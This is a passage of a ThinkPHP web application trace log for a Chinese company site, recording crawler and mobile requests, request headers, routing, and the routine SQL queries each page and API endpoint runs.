( 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T17:46:42+08:00 ] 116.179.32.178 GET /index/contanct/lxwm.html [ info ] www.kinsana.cn/index/contanct/lxwm.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,325.80kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'lxwm', ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-cn,zh-tw', 'user-agent' => 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/lxwm_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->lxwm[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\lxwm.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T18:12:05+08:00 ] 116.179.32.50 GET /index/news/xwxq/id/189.html [ info ] www.kinsana.cn/index/news/xwxq/id/189.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,192.11kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-cn,zh-tw', 'user-agent' => 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/189_html' => '', 'id' => '189', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 189 LIMIT 1 [ RunTime:0.015625s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 189 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:12:06+08:00 ] 116.179.32.138 GET /index/news/xwxq/id/189.html [ info ] www.kinsana.cn/index/news/xwxq/id/189.html [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:2,192.40kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-cn,zh-tw', 'user-agent' => 'Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/189_html' => '', 'id' => '189', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 189 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 189 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:12:46+08:00 ] 52.80.63.138 POST /api/index/nypro [ info ] www.kinsana.cn/api/index/nypro [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,387.44kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'nypro', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.5160.1069 Mobile Safari/537.36', 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh,zh-CN;q=0.9', 'origin' => 'http://www.kinsana.cn', 'content-length' => '0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/nypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->nypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 [ RunTime:0.078125s ] --------------------------------------------------------------- [ 2021-07-16T18:12:47+08:00 ] 52.80.63.138 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,696.16kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.5160.1069 Mobile Safari/537.36', 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh,zh-CN;q=0.9', 'origin' => 'http://www.kinsana.cn', 'content-length' => '9', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '5', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 5 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (8,3,10,7,5,4,1,6) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:13:16+08:00 ] 218.23.234.7 POST /api/index/jqpro [ info ] www.kinsana.cn/api/index/jqpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,796.42kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'jqpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/jqycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'accept-language' => 'zh,zh-CN;q=0.9', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.7470.1608 Mobile Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'content-length' => '0', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/jqpro' => '', ) [ info ] [ RUN ] app\api\controller\Index->jqpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:13:17+08:00 ] 218.23.234.7 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,693.35kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/jqycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'accept-language' => 'zh,zh-CN;q=0.9', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.7470.1608 Mobile Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'content-length' => '9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '1', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (8,5,1,3) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:14:38+08:00 ] 52.80.202.53 POST /api/index/newscontent [ info ] www.kinsana.cn/api/index/newscontent [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,736.30kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'newscontent', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/xwxq.html?id=11', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3693.1307 Mobile Safari/537.36', 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh,zh-CN;q=0.9', 'origin' => 'http://www.kinsana.cn', 'content-length' => '5', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/newscontent' => '', 'id' => '11', ) [ info ] [ RUN ] app\api\controller\Index->newscontent[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 11 LIMIT 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:15:28+08:00 ] 120.244.131.36 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,694.79kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'accept-language' => 'zh,zh-CN;q=0.9', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.9810.1382 Mobile Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'content-length' => '9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '3', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1,2,3,7,5,10) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:15:28+08:00 ] 120.244.131.36 POST /api/index/cwypro [ info ] www.kinsana.cn/api/index/cwypro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,715.15kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'cwypro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'accept-language' => 'zh,zh-CN;q=0.9', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.9810.1382 Mobile Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'content-length' => '0', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/cwypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->cwypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 3 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:17:33+08:00 ] 54.36.148.22 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,015.80kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:17:37+08:00 ] 168.119.68.185 GET /ajaxArea.php?id=1000139 [ info ] www.kinsana.cn/ajaxArea.php?id=1000139 [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,070.59kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'ajaxArea.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-language' => 'en-US', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'accept' => '*/*', 'cache-control' => 'no-cache', 'pragma' => 'no-cache', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/ajaxArea_php' => '', 'id' => '1000139', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T18:17:37+08:00 ] 168.119.68.185 POST /index/index/proapi.html [ info ] www.kinsana.cn/index/index/proapi.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,904.95kb] [文件加载:49] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'index', 2 => 'proapi', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-language' => 'en-US', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'x-requested-with' => 'XMLHttpRequest', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'cache-control' => 'no-cache', 'pragma' => 'no-cache', 'content-length' => '7', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/index/proapi_html' => '', 'cates' => '5', ) [ info ] [ RUN ] app\index\controller\Index->proapi[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`sm_img`,`name`,`pro_name`,`sp` FROM `product` WHERE `cate_id` = 5 AND `is_top` = 1 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 4 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:19:34+08:00 ] 118.184.177.54 GET /index/contanct/lxwm.html [ info ] www.kinsana.cn/index/contanct/lxwm.html [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,325.80kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'lxwm', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/lxwm_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->lxwm[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\lxwm.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T18:24:56+08:00 ] 123.6.49.36 GET / [ info ] www.kinsana.cn/ [运行时间:0.218750s][吞吐率:4.57req/s] [内存消耗:2,016.62kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1', 'connection' => 'close', 'accept-language' => 'zh-CN', 'accept' => '*/*', 'cookie' => '', 'referer' => 'http://www.kinsana.cn/', 'accept-encoding' => 'deflate, gzip', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.062500s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.031250s ] --------------------------------------------------------------- [ 2021-07-16T18:25:55+08:00 ] 61.151.178.166 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.34kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.xn--vhqsn14am88k.com', 'accept-language' => 'zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.27.400 QQBrowser/9.0.2524.400', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] 